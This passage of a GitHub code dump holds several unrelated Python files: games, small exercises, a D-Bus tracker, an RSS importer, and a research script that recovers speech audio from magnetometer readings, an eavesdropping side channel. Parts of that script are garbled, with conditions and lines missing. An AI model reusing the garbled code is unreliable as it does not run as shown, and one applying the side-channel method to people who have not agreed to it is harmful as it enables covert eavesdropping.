[row][col] position.\n        :param board_obj: SudokuBoard object.\n        :return: True if the move was applied, otherwise None\n        \"\"\"\n        if self.input_validations(row, col, value, board_obj) is True:\n            if board_obj.is_move_legal(self,row,col,value) is True:\n                board_obj.update_board(row, col, value)\n                return True\n            else:\n                print(\"Try another value\")\n        else:\n            print(\"Try another value between 0-9\")\n\n    def check_row(self,row, val, board_obj):\n        \"\"\"\n        Checks whether the proposed value already occurs in the row\n        :param row: The row to be checked\n        :param val: The value to be checked\n        :param board_obj: SudokuBoard object\n        :return: True or False\n        \"\"\"\n        used_nums = []\n\n        for i in range(9):\n            temp_val = board_obj.get_board_value(row, i)\n            if temp_val == 0:\n                pass\n            else:\n                if temp_val not in used_nums:\n                    used_nums.append(temp_val)\n        if val in used_nums:\n            return False\n        else:\n            return True\n\n    def check_col(self, col, val, board_obj):\n        \"\"\"\n        Checks whether the proposed value already occurs in the column\n        :param col: The col to be checked\n        :param val: The value to be checked\n        :param board_obj: SudokuBoard object\n        :return: True or False\n        \"\"\"\n        used_nums = []\n\n        for i in range(9):\n            temp_val = board_obj.get_board_value(i, col)\n            if temp_val == 0:\n                pass\n            else:\n                if temp_val not in used_nums:\n                    used_nums.append(temp_val)\n\n        if val in used_nums:\n            return False\n        else:\n            return True\n\n    def check_square(self, square, val, board_obj):\n        \"\"\"\n        Checks whether the proposed value already occurs in the subgrid\n        :param square: The tuple representation the subgrid\n        :param val: The value to be checked\n        :param board_obj: SudokuBoard object\n        :return: True or False\n        \"\"\"\n\n        used_nums = []\n        rows = square[0]\n        cols = square[1]\n\n        for i in range(rows[0], rows[1] + 1):\n            for y in range(cols[0], cols[1] + 1):\n                temp_val = board_obj.get_board_value(i, y)\n                if temp_val == 0:\n                    pass\n                elif temp_val not in used_nums:\n                    used_nums.append(temp_val)\n        if val in used_nums:\n            return False\n        else:\n            return True\n\n\ndef diff_level_function():\n    \"\"\"\n    Runs automatically when the program is run. Prompts the user for a valid difficulty and\n    calls the SudokuGame and SudokuBoard classes so that the game can be played\n    :return: None\n    \"\"\"\n    diff_level = input(\"Easy, Medium, Hard, Brute Force, or Verify? \")
\")\n\n if diff_level == \"Easy\" or diff_level == \"easy\":\n game = SudokuBoard(\"Easy\")\n elif diff_level == \"Medium\" or diff_level == \"medium\":\n game = SudokuBoard(\"Medium\")\n elif diff_level == \"Hard\" or diff_level == \"hard\":\n game = SudokuBoard(\"Hard\")\n elif diff_level == \"Brute Force\" or diff_level == \"brute force\":\n game = SudokuBoard(\"Brute Force\")\n elif diff_level == \"Verify\" or diff_level == \"Verify\":\n game = SudokuBoard(\"Verify\")\n else:\n print(\"You'll need to enter a difficulty level\")\n diff_level_function()\n\n\ndiff_level_function()\n","repo_name":"TaylorGooge/Sudoku_Game","sub_path":"sudoku_game.py","file_name":"sudoku_game.py","file_ext":"py","file_size_in_byte":21766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35980239088","text":"n1 = int (input('Um valor: '))\nn2 = int (input('Outro valor: '))\n\nsoma = n1+n2\nmult = n1*n2\ndiv = n1/2\ndivint = n1//n2\nsobradiv = n1%n2\npot = n1**n2\n\nprint ('a soma é {}, a multiplicação é {}, a divisão é {} a divisão inteira é {}'.format(soma,mult,div,divint), end=' ')\nprint ('e a potencia é {}'.format (pot))\n","repo_name":"FilipeBorsari/GuanabaraPython","sub_path":"Ex007.py","file_name":"Ex007.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42934125804","text":"from hymn.types.maybe import Just, Nothing, is_nothing\nfrom pyherc.aspects import log_debug, log_info\n\n\nclass ActionFactory():\n \"\"\"\n Object for creating actions\n \"\"\"\n\n @log_debug\n def __init__(self, model, factories):\n \"\"\"\n Construct ActionFactory\n\n Args:\n model: model to register for the factory\n factories: a single Factory or list of Factories to use\n \"\"\"\n super().__init__()\n\n if hasattr(factories, '__iter__'):\n self.factories = factories\n else:\n self.factories = []\n self.factories.append(factories)\n\n self.model = model\n\n def __call__(self, parameters):\n \"\"\"\n Temporary magic method to make this behave like a function\n\n returns:\n Just(Action) when creation of Action was possible\n Nothing when creation of Action was not possible\n \"\"\"\n iterator = iter(self.factories)\n res = Nothing\n for fn in iter(self.factories):\n res = fn(parameters)\n if not is_nothing(res):\n return res\n return Nothing\n\n @log_info\n def get_action(self, parameters):\n \"\"\"\n Create an action\n\n Args:\n parameters: Parameters used to control action creation\n \"\"\"\n factory = self.get_sub_factory(parameters)\n assert factory is not None, 'suitable factory not configured'\n return factory.get_action(parameters)\n\n @log_debug\n def get_sub_factories(self):\n \"\"\"\n Get all sub factories\n\n Returns:\n List of sub factories\n \"\"\"\n return self.factories\n\n @log_debug\n def get_sub_factory(self, parameters):\n \"\"\"\n Get sub factory to handle parameters\n\n Args:\n parameters: Parameters to use for searching the factory\n\n Returns:\n Sub factory if found, None otherwise\n \"\"\"\n subs = [x for x in self.factories if x.can_handle(parameters)]\n\n if len(subs) == 1:\n return subs[0]\n else:\n return None\n","repo_name":"tuturto/pyherc","sub_path":"src/pyherc/rules/public.py","file_name":"public.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"6"} +{"seq_id":"29462947439","text":"from functools import partial\nfrom collections import 
\nfrom cache import smart_dict\nimport dbus\n\nclass Tracker(object):\n\tdef __init__(self):\n\t\tself.cache = smart_dict()\n\t\tself.watches = defaultdict(list)\n\n\tdef unwrap_dbus_value(self, val):\n\t\t# Converts D-Bus values back to the original type. For example if val is of type DBus.Double, a float will be returned.\n\t\tif isinstance(val, (dbus.Int32, dbus.UInt32, dbus.Byte, dbus.Int16, dbus.UInt16, dbus.Int64, dbus.UInt64)):\n\t\t\treturn int(val)\n\t\tif isinstance(val, dbus.Double):\n\t\t\treturn float(val)\n\t\tif isinstance(val, dbus.String):\n\t\t\treturn str(val)\n\n\t\treturn val\n\n\tdef update_cache(self, callback, key, v):\n\t\tif isinstance(v, dbus.Dictionary):\n\t\t\tvalue = v[\"Value\"]\n\t\telif isinstance(v, dbus.Array):\n\t\t\tvalue = None\n\t\telse:\n\t\t\tvalue = v\n\n\t\tif isinstance(value, dbus.Array):\n\t\t\tvalue = None\n\n\t\tself.cache[key] = v = self.unwrap_dbus_value(value)\n\t\tif callback is not None:\n\t\t\tcallback(v)\n\n\tdef query(self, conn, service, path):\n\t\ttry:\n\t\t\treturn conn.call_blocking(service, path, None, \"GetValue\", '', [])\n\t\texcept:\n\t\t\treturn None\n\n\tdef track(self, conn, service, path, target, callback=None):\n\n\t\t# Initialise cache values\n\t\tself.update_cache(callback, target, self.query(conn, service, path))\n\n\t\t# If there are values on dbus update cache after property change\n\t\tself.watches[service].append((target, conn.add_signal_receiver(\n\t\t\tpartial(self.update_cache, callback, target),\n\t\t\tdbus_interface='com.victronenergy.BusItem',\n\t\t\tsignal_name='PropertiesChanged',\n\t\t\tpath=path,\n\t\t\tbus_name=service\n\t\t)))\n\n\t\t# ItemsChanged\n\t\tdef update_items(items):\n\t\t\ttry:\n\t\t\t\tself.update_cache(callback, target, items[path])\n\t\t\texcept (TypeError, KeyError):\n\t\t\t\tpass\n\n\t\tself.watches[service].append((target, conn.add_signal_receiver(\n\t\t\tupdate_items,\n\t\t\tdbus_interface='com.victronenergy.BusItem',\n\t\t\tsignal_name='ItemsChanged',\n\t\t\tpath='/',\n\t\t\tbus_name=service\n\t\t)))\n\n\tdef cleanup(self, name):\n\t\tif name in self.watches:\n\t\t\tfor target, w in self.watches[name]:\n\t\t\t\tw.remove()\n\t\t\t\tself.update_cache(None, target, None)\n\t\t\tdel self.watches[name]\n","repo_name":"victronenergy/dbus-characterdisplay","sub_path":"track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"23762216049","text":"#!/usr/bin/python\nimport sys\nimport traceback\nimport feedparser #rss parser\nimport intersys.pythonbind3\nfrom time import gmtime, strftime, localtime\nfrom twTOM import getprops\n\ndef saveToDB(parsedObj, category):\n    secrets = getprops(\"WIBIS.properties\")\n    user = secrets['USERNAME']\n    password = secrets['PASSWORD']\n    host = secrets['HOST']\n    port = secrets['PORT']\n\n    try:\n        url = host+\"[\"+port+\"]:SMSWIBIS\"\n        conn = intersys.pythonbind3.connection()\n        conn.connect_now(url, user, password, None)\n        database = intersys.pythonbind3.database(conn)\n\n        if (len(parsedObj.entries)!=0):\n            entries = parsedObj.entries\n            for entry in entries:\n                entryTimeStamp = convertToLocal(entry['published_parsed'])\n                sc = database.run_class_method('%BI.RSSTemp','FetchData',[entry.summary, entry.title, category, entry.link, entry.id, entryTimeStamp[0], entryTimeStamp[1]])\n                #print(sc);\n                #print(entry.title);\n\n    except intersys.pythonbind3.cache_exception as err:\n        # 'except Exc ( err ):' is a syntax error, and sys.exc_type is Python 2 only\n        print(\"InterSystems Cache' exception\")\n        print(str(err))\n        traceback.print_exc()\n\ndef parseRSS(link):\n    d = feedparser.parse(link)\n    return d\n\ndef convertToLocal(ts):\n    from datetime import datetime\n    from dateutil import tz\n\n    thisDate = strftime('%d/%m/%Y', ts)\n    thisTime = strftime('%H:%M:%S', ts)\n\n    from_zone = tz.tzutc()\n    to_zone = tz.tzlocal()\n    utc = datetime.strptime(thisDate + ' ' + thisTime, '%d/%m/%Y %H:%M:%S')\n    utc = utc.replace(tzinfo=from_zone)\n    local = utc.astimezone(to_zone)\n    localTime = '{:%H:%M:%S}'.format(local)\n    return (thisDate, localTime)\n\n\nlink = sys.argv[1]\ncategory = sys.argv[2]\nrssObj = parseRSS(link)\nsaveToDB(rssObj, category)\n","repo_name":"qayyuum85/TestScript","sub_path":"RSSParsertoCacheWIBIS.py","file_name":"RSSParsertoCacheWIBIS.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"26715873704","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 12 17:29:39 2018\n\n@author: dumapath\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nx = [0,1,2,3,4,5]\ny = [10,20,15,18,7,19]\nxlabels = ['jan','feb','mar','apr','may','jun']\n\n# the original loop tested `if i in []`, which can never be true, so the\n# label-blanking branch was dead code; this keeps the same plain copy\nxlabelsnew = list(xlabels)\n\nplt.plot(x,y)\nplt.xticks(range(0,len(x)),xlabelsnew,rotation=45)\nplt.show()","repo_name":"Darshan1917/matplotlib_basics","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"44855964026","text":"#https://leetcode.com/problems/subsets/submissions/\nclass Solution:\n    def subsets(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        if nums == []:\n            return []\n        ans = []\n        for num in nums:\n            ans.append([num])\n        \n        subs = ans\n        while len(subs)!=1:\n            nex = []\n            for sub in subs:\n                shouldapp = False\n                for num in nums:\n                    if not shouldapp and num == sub[-1]:\n                        shouldapp = True\n                    elif shouldapp:\n                        nex.append(sub+[num])\n            ans.extend(nex)\n            subs = nex\n        ans.append([])\n        return ans\n\n\ns = Solution()\nprint(s.subsets([1,2,3,4]))","repo_name":"sandeepjoshi1910/Algorithms-and-Data-Structures","sub_path":"leetcode/powerset.py","file_name":"powerset.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"1141040273","text":"import pygame\nimport sys\nimport time\n\nfrom tictactoe import TicTacToe\n\npygame.init()\nsize = width, height = 400, 600\n\n# Colors\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\n\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Tic Tac Toe vs AI\")\n\nlogo_file = \"./assets/img/logo.png\"\nlogo_image = pygame.image.load(logo_file)\nlogo_image = pygame.transform.scale(logo_image, (32, 32))\npygame.display.set_icon(logo_image)\n\nbg_file = \"./assets/img/bg_image.jpg\"\nbg_image = pygame.image.load(bg_file)\nbg_image = pygame.transform.scale(bg_image, size)\n\nfont_file = \"./assets/font/Catskin.otf\"\nmediumFont = pygame.font.Font(font_file, 35)\nsmallFont = pygame.font.Font(font_file, 25)\nlargeFont = pygame.font.Font(font_file, 80)\nllargeFont = pygame.font.Font(font_file, 55)\nmoveFont = pygame.font.Font(font_file, 60)\n\nuser = None\ngame_board = TicTacToe()\nai_turn = False\n\nwhile True:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:
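\n            # (note, not from the original) sys.exit() alone works here; a common\n            # variant also releases the display first, e.g.:\n            #   pygame.quit()\n            #   sys.exit()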
\n            sys.exit()\n\n    screen.blit(bg_image, bg_image.get_rect())\n\n    # Player picks a side\n    if user is None:\n        # Title\n        title = largeFont.render(\"Tic-Tac-Toe\", True, white)\n        titleRect = title.get_rect()\n        titleRect.center = ((width/ 2), 180)\n        screen.blit(title, titleRect)\n\n        # Button X\n        playXButton = pygame.Rect(5*(width / 8), (height / 2), width / 2.5, 50)\n        playX = mediumFont.render(\"Play as X\", True, black)\n        playXRect = playX.get_rect()\n        playXButton.center=((width / 2), 300)\n        playXRect.center = playXButton.center\n        pygame.draw.rect(screen, white, playXButton,border_top_right_radius=20,\n                border_bottom_right_radius=20,border_bottom_left_radius=20,\n                border_top_left_radius=20)\n        screen.blit(playX, playXRect)\n\n        # Button O\n        playOButton = pygame.Rect(5 * (width / 2), (height / 2), width / 2.5, 50)\n        playO = mediumFont.render(\"Play as O\", True, black)\n        playORect = playO.get_rect()\n        playOButton.center=((width / 2), 370)\n        playORect.center = playOButton.center\n        pygame.draw.rect(screen, white, playOButton,border_top_right_radius=20,\n                border_bottom_right_radius=20,border_bottom_left_radius=20,\n                border_top_left_radius=20)\n        screen.blit(playO, playORect)\n\n        # Exit button\n        exitButton = pygame.Rect(5 * (width / 2), (height / 2), width / 2.5, 50)\n        exit = mediumFont.render(\"Exit\", True, black)\n        exitRect = exit.get_rect()\n        exitButton.center=((width / 2), 440)\n        exitRect.center = exitButton.center\n        pygame.draw.rect(screen, white, exitButton,border_top_right_radius=20,\n                border_bottom_right_radius=20,border_bottom_left_radius=20,\n                border_top_left_radius=20)\n        screen.blit(exit, exitRect)\n\n        # Check if a button was clicked\n        click, _, _ = pygame.mouse.get_pressed()\n        if click == 1:\n            mouse = pygame.mouse.get_pos()\n            if playXButton.collidepoint(mouse):\n                time.sleep(0.2)\n                user = TicTacToe.X\n            elif playOButton.collidepoint(mouse):\n                time.sleep(0.2)\n                user = TicTacToe.O\n            elif exitButton.collidepoint(mouse):\n                time.sleep(0.2)\n                pygame.quit()\n                sys.exit()\n    # tictactoe board\n    else:\n        # Game board\n        tile_size = 80\n        tile_origin = (width / 2 - (1.5 * tile_size),\n                       height / 3 - (1.5 * tile_size))\n        tiles = []\n        for i in range(3):\n            row = []\n            for j in range(3):\n                rect = pygame.Rect(\n                    tile_origin[0] + j * tile_size,\n                    tile_origin[1] + i * tile_size,\n                    tile_size, tile_size\n                )\n                pygame.draw.rect(screen, white, rect, 3)\n                if game_board.state[i][j] != TicTacToe.EMPTY:\n                    move = moveFont.render(game_board.state[i][j], True, white)\n                    moveRect = move.get_rect()\n                    moveRect.center = rect.center\n                    screen.blit(move, moveRect)\n                row.append(rect)\n            tiles.append(row)\n\n        game_over = game_board.terminal(game_board.state)\n        player = game_board.player(game_board.state)\n\n        # Show the title\n        if game_over:\n            winner = game_board.winner(game_board.state)\n            if winner is None:\n                title = f\"Game Over : Draw\"\n            else:\n                player_winner = \"AI\" if not ai_turn else \"You\"\n                title = f\"Game Over : {player_winner} Win!\"\n        elif user == player:\n            title = f\" Current player: {user} \"\n            turn = mediumFont.render(\"Your Turn\", True, white)\n            titlesRect = turn.get_rect()\n            titlesRect.center = ((width / 2), 420)\n            screen.blit(turn, titlesRect) \n        else:\n            title = f\" Current player: {player} \"\n            turn = mediumFont.render(\"Wait for Your Turn\", True, white)\n            titlesRect = turn.get_rect()\n            titlesRect.center = ((width / 2), 420)\n            screen.blit(turn, titlesRect) \n        \n        title = mediumFont.render(title, True, white)\n        titleRect = title.get_rect()\n        titleRect.center = ((width / 2), 380)\n        screen.blit(title, titleRect)\n        \n\n        # Check the AI's move\n        if user != player and not game_over:\n            if ai_turn:\n                time.sleep(0.5)\n                move = game_board.alpha_beta_search()\n                game_board.state = game_board.result(game_board.state, move)\n                ai_turn = False\n            else:\n                ai_turn = True\n\n        # Check the user's move\n        click, _, _ = pygame.mouse.get_pressed()\n        if click == 1 and user == player and not game_over:\n            mouse = pygame.mouse.get_pos()\n            for i in range(3):\n                for j in range(3):\n                    if (game_board.state[i][j] == TicTacToe.EMPTY and tiles[i][j].collidepoint(mouse)):\n                        game_board.state = game_board.result(game_board.state, (i, j))\n\n        if game_over:\n            # play again\n            againButton = pygame.Rect(5 * (width / 2), (height / 2), width / 2.5, 50)\n            again = smallFont.render(\"Play Again\", True, black)\n            againRect = again.get_rect()\n            againButton.center=((width / 2), 480)\n            againRect.center = againButton.center\n            pygame.draw.rect(screen, white, againButton,border_top_right_radius=20,\n                    border_bottom_right_radius=20,border_bottom_left_radius=20,\n                    border_top_left_radius=20)\n            screen.blit(again, againRect)\n            click, _, _ = pygame.mouse.get_pressed()\n            if click == 1:\n                mouse = pygame.mouse.get_pos()\n                if againButton.collidepoint(mouse):\n                    time.sleep(0.2)\n                    user = None\n                    game_board.clear()\n                    ai_turn = False\n            # exit\n            exitButton = pygame.Rect(5 * (width / 2), (height / 2), width / 2.5, 50)\n            exit = smallFont.render(\"Exit\", True, black)\n            exitRect = exit.get_rect()\n            exitButton.center=((width / 2), 540)\n            exitRect.center = exitButton.center\n            pygame.draw.rect(screen, white, exitButton,border_top_right_radius=20,\n                    border_bottom_right_radius=20,border_bottom_left_radius=20,\n                    border_top_left_radius=20)\n            screen.blit(exit, exitRect)\n            click, _, _ = pygame.mouse.get_pressed()\n            if click == 1:\n                mouse = pygame.mouse.get_pos()\n                if exitButton.collidepoint(mouse):\n                    time.sleep(0.2)\n                    pygame.quit()\n                    sys.exit()\n            \n        else:\n            againButton = pygame.Rect(5 * (width / 2), (height / 2), width / 2.5, 50)\n            again = smallFont.render(\"Back to Menu\", True, black)\n            againRect = again.get_rect()\n            againButton.center=((width / 2), 520)\n            againRect.center = againButton.center\n            pygame.draw.rect(screen, white, againButton,border_top_right_radius=20,\n                    border_bottom_right_radius=20,border_bottom_left_radius=20,\n                    border_top_left_radius=20)\n            screen.blit(again, againRect)\n            click, _, _ = pygame.mouse.get_pressed()\n            if click == 1:\n                mouse = pygame.mouse.get_pos()\n                if againButton.collidepoint(mouse):\n                    time.sleep(0.2)\n                    user = None\n                    game_board.clear()\n                    ai_turn = False\n    \n    pygame.display.flip()\n","repo_name":"wisnupramoedya/KB_Kelompok3_AdversialSearch_Tic-Tac-Toe","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":8741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
{"seq_id":"74486541946","text":"import serial\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import signal\nfrom scipy.io import wavfile\nimport os\n\n\nNFFT_S = 20\nNOVERLAT_S = 40\nSHAPE = 51\nlow, high = 4, 10\nSR = 500\nNEW_SR = 2000\n\nNFFT_S = 10\nNOVERLAT_S = 15\nSHAPE = 257\nlow, high = 30, 76\nSR = 500\nNEW_SR = 2000\n\n\n\n\n# NFFT_S = 10\n# NOVERLAT_S = 20\n# SHAPE = 101\n# low, high = 80, 160\n# SR = 500\n# NEW_SR = 2000\n# BAND = 80 # mag 20 acc 80\n# MIN_SUM = 0.002 # mag 15 acc 0.0020\n# SENSORNAME = 'mag'\n# plt.rcParams[\"font.family\"] = \"Times New Roman\"\n\n\ndef my_interpolate(my_signal,length):\n    x = 
np.linspace(0,len(my_signal),len(my_signal),endpoint=False)\n new_x = np.linspace(0,len(my_signal),length,endpoint=False)\n ans = np.interp(new_x,x,my_signal) # 新的x轴 原信号x轴 原信号y轴\n return ans\n\ndef read_wav(filename):\n sampling_freq, audio = wavfile.read(filename)\n return sampling_freq, audio\n\ndef save_json(filename,data):\n save_json = filename\n with open(save_json, 'w') as f:\n json.dump(data, f)\n\n\ndef get_base_freq_modified(mag_magnitude,low,high, MIN_SUM):\n m, n = mag_magnitude.shape\n p = np.zeros((m, n)) # 记录每个时间点内左右可能是谐波的点\n for j in range(n):\n for i in range(low,high):\n now_i = i # now_i 为目前判定为基频的频率值\n # now_sum = get_nearby_m(mag_magnitude, now_i, j)\n idx = 2\n hs = np.array(list(range(1,idx)))*now_i\n new_hs = []\n for hs_i in hs:\n if hs_i <= mag_magnitude.shape[0]:\n # new_hs.append(hs_i)\n for idx in range(-2,3):\n hs_idx = hs_i+idx\n if 0 < hs_idx < mag_magnitude.shape[0]:\n new_hs.append(hs_idx)\n # if hs_i-1>0:\n # new_hs.append(hs_i-1)\n # if hs_i+10:\n new_harmonics[idx] = int(np.mean(tmp_list))\n\n\n # plt.figure()\n # plt.plot(new_harmonics)\n # plt.show()\n\n # for idx,i in enumerate(harmonics):\n # if i!=0:\n # if harmonics[]\n # begin_idx = idx - 2\n # end_idx = idx + 2\n # if begin_idx < 0:\n # begin_idx = 0\n # if end_idx>len(harmonics):\n # end_idx = len(harmonics)\n # tmp_harmonics = harmonics[begin_idx:end_idx]\n # harmonics[idx] = int(np.mean(harmonics))\n\n # minus_harmonics = []\n # for idx,i in enumerate(harmonics):\n\n\n # plt.figure()\n # plt.plot(harmonics)\n # plt.show()\n\n\n return new_harmonics\n # return harmonics\n\n\ndef get_magnitude_mat(Zxx):\n magnitude_mat = np.abs(Zxx)\n return magnitude_mat\n\ndef read_json(filename):\n with open(filename, 'r', encoding='utf8')as fp:\n json_data = json.load(fp)\n return json_data\n\ndef to_12bit_int(raw_data):\n \"\"\"\n 接收到16bit数据,去除4bit最低位没用到的数据\n 把12bit的16进制字符串转化成12bit的补码数值\n\n :param raw_data: 16进制字符串数据\n :return: 磁感应强度 单位mG\n \"\"\"\n # print(raw_data)\n ans = 0\n if len(raw_data) == 4:\n raw_data = raw_data[0:-1]\n raw_data = bin(int(raw_data, 16))\n raw_data = raw_data[2:]\n\n if len(raw_data) != 12:\n for i in range(12-len(raw_data)):\n raw_data = \"0\" + raw_data\n for i in str(raw_data)[1:]:\n ans = ans * 2 + int(i)\n if int(str(raw_data)[0]) == 0:\n ans -= 2048\n return ans*7.8125/10\n\ndef add_zero(s):\n new_s = []\n for i in s:\n new_s.append(i)\n new_s.append(0)\n return new_s\n\ndef mul_minus1(s):\n new_s = []\n for idx,i in enumerate(s):\n new_s.append(i*pow(-1,idx+1))\n return new_s\n\ndef spectrum_transaltion(s):\n new_s0 = add_zero(s)\n new_s1 = mul_minus1(s)\n new_s1 = add_zero(new_s1)\n b, a = signal.butter(8, 0.5, 'lowpass') # 配置滤波器 8 表示滤波器的阶数\n new_s0 = signal.filtfilt(b, a, new_s0) # data为要过滤的信号\n b, a = signal.butter(8, 0.5, 'highpass') # 配置滤波器 8 表示滤波器的阶数\n new_s1 = signal.filtfilt(b, a, new_s1) # data为要过滤的信号\n res = new_s0+new_s1\n # f, t, Zxx = signal.stft(res, fs=sr*2, nperseg=256, noverlap=128)\n # mat = get_magnitude_mat(Zxx)\n # my_plot(mat,sr)\n return res\n\ndef my_plot(mat, y_len):\n plt.figure()\n plt.pcolormesh(np.linspace(0, mat.shape[1], mat.shape[1]),np.linspace(0, y_len, mat.shape[0]), mat, shading='auto', cmap=\"magma\")\n # plt.colorbar()\n plt.show()\n\n\ndef get_new_freq(m, old_freq):\n if old_freq == m*2:\n return 0\n if old_freq == m:\n return m\n if old_freq % m == 0:\n if old_freq/m%2 == 0:\n return 0\n else:\n return m\n while old_freq > m:\n num = int(old_freq/m)\n num = num*m*2\n old_freq = num - old_freq\n # print(old_freq)\n return 
old_freq\n\n\ndef fold_mat(mat):\n \"\"\"\n fold the mat\n :param mat:\n :return:\n \"\"\"\n # print(\"mat\",mat)\n tmp_mat = mat[::-1]\n test_mat = np.vstack((mat[:-1, :], mat[-1, :], tmp_mat[1:, :]))\n test_mat = np.vstack((test_mat[:-1, :], test_mat[-1, :], test_mat[::-1][1:, :]))\n # test_mat = np.vstack((test_mat[:-1, :], test_mat[-1, :], test_mat[::-1][1:, :]))\n # test_mat = np.vstack((test_mat[:-1, :], test_mat[-1, :], test_mat[::-1][1:, :]))\n test_mat = test_mat[:SHAPE,:]\n return test_mat\n\n\ndef read_mag(mag_data):\n mag = []\n for i in mag_data.split(\" \")[:-1]: # 去掉最后一个回车\n if len(i) > 0:\n # print(to_12bit_int(i))\n mag.append(to_12bit_int(i))\n # plt.figure()\n # plt.plot(mag)\n # plt.show()\n save_json(\"d:/test.json\",{\"data\":mag})\n b, a = signal.butter(8, 2 * 20 / 500, 'highpass') # 配置滤波器 8 表示滤波器的阶数\n mag = signal.filtfilt(b, a, mag) # data为要过滤的信号\n f, t, Zxx = signal.stft(mag, fs=SR, nperseg=int(SR // NFFT_S), noverlap=int(SR // NOVERLAT_S))\n return get_magnitude_mat(Zxx)\n\n\ndef GLA(S, n_iter=100, n_fft=4096, hop_length=None, window='hann',fs=1000):\n hop_length = n_fft//4 if hop_length is None else hop_length\n m_phase = np.exp(2j*np.pi*np.random.rand(*S.shape))\n for i in range(n_iter):\n xi = np.abs(S).astype(np.complex)*m_phase # 原始幅度谱与相位谱组合成ZXX\n m_signal = signal.istft(xi, fs, nfft=n_fft*2,nperseg=n_fft,noverlap=hop_length,boundary = None)[1] # 使用Zxx还原回时域信号\n\n next_xi = signal.stft(m_signal, fs, nfft=n_fft*2,nperseg=n_fft,noverlap=hop_length,padded = False, boundary = None)[2]\n\n m_phase = np.exp(1j*np.angle(next_xi)) # 取相位\n\n xi = np.abs(S).astype(np.complex)*m_phase\n m_signal = signal.istft(xi, fs, nperseg=n_fft,noverlap=hop_length)[1]\n return m_signal\n\n\ndef save_wav(filename,sampling_freq,my_signal):\n my_signal = np.array(my_signal,dtype=\"float\")\n my_signal /= my_signal.max()\n # plt.figure()\n # plt.plot(my_signal)\n # plt.show()\n my_signal *= np.iinfo(np.int32).max\n my_signal = np.asarray(my_signal, dtype=np.int32)\n wavfile.write(filename, sampling_freq, my_signal)\n\ndef sum_xy(xs, ys, mat):\n mat_shape = mat.shape\n tmp_list = []\n for x, y in zip(xs,ys):\n if 0 new_mat[int((i) * (idx-1) + x)][j]:\n # # new_mat[new_i][j]/=4\n # # print(\"!!!!\")\n # pass\n\n\n\n\n\n\n\n # 增加 谐波能量平滑功能\n\n\n # ans_mat = np.zeros((SHAPE, n))\n # for i in range(ans_mat.shape[0]):\n # for j in range(ans_mat.shape[1]):\n # if mat[i][j]>1e-8:\n # new_is = i + x_plus\n # new_js = j + y_plus\n # tmp_list = []\n # for new_i,new_j in zip(new_is,new_js):\n # if 0< new_i 1e-8:\n # tmp_list.append(mat[new_i][new_j])\n #\n # # print(tmp_list)\n # ans_mat[i][j] = np.sum(tmp_list)\n # # ans_mat[i][j] = new_mat[i][j]\n\n # plt.figure()\n # plt.subplot(1, 3, 1)\n # plt.pcolormesh(np.linspace(0, mat.shape[1], mat.shape[1]),np.linspace(0, 250, mat.shape[0]), mat, shading='auto', cmap=\"magma\")\n # plt.colorbar()\n #\n # plt.subplot(1, 3, 2)\n # plt.pcolormesh(np.linspace(0, mat.shape[1], mat.shape[1]), np.linspace(0, 1000, new_mat.shape[0]), new_mat, shading='auto', cmap=\"magma\")\n # plt.colorbar()\n # return ans_mat\n return new_mat\n\n\ndef read_serial(serialPort=\"COM4\",baudRate=115200):\n flg = False\n ser = serial.Serial(serialPort, baudRate, timeout=0.5)\n print(\"参数设置:串口=%s ,波特率=%d\" % (serialPort, baudRate))\n while 1:\n s = ser.readline()\n # if len(s) != 0 and s[0] != 'x':\n s = str(s, \"utf-8\")\n if len(s) > 10 and s[0] == 'M' and s[1] == 'a' and s[2] == 'g':\n print(\"磁力计读取数据中\")\n flg = True\n if len(s) > 10000:\n # print(s)\n flg = False\n 
print(\"\\nRecovering speech data\")\n            mat = read_mag(s)\n            # my_plot(mat, 250)\n            p = get_base_freq_modified(fold_mat(mat), low, high)\n            new_mat = get_new_mat(mat, p)\n            # my_plot(new_mat, 1000)\n            origin_signal = GLA(new_mat, n_fft=int(NEW_SR // NFFT_S), n_iter=100, hop_length=int(NEW_SR / NOVERLAT_S),\n                                fs=NEW_SR)\n            save_wav(\"d:/test.wav\", int(NEW_SR), origin_signal)\n            # song = AudioSegment.from_wav(\"d:/test.wav\")\n            # play(song)\n            os.system(\"d:/test.wav\")\n\n        if flg and len(s) == 0:\n            print(\"-> \", end=\"\")\n\n# os.system(\"d:/test.wav\")\n# read_serial()\n\n\n\n","repo_name":"zju-muslab/VoiceListener","sub_path":"preprocessing/h.py","file_name":"h.py","file_ext":"py","file_size_in_byte":12296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} {"seq_id":"71477020348","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\nA = list(map(int, input().split()))\n\ndp = [1 for _ in range(n)]\n# my_list = [int(1e9) for _ in range(n+1)]\n# my_list[1]=A[0]\nfor i in range(1, n):\n    for j in range(i):\n        if A[i] > A[j]:\n            # if dp[i] < dp[j]+1:\n            #     dp[i] = dp[j]+1\n            # my_list[dp[j]+1] = 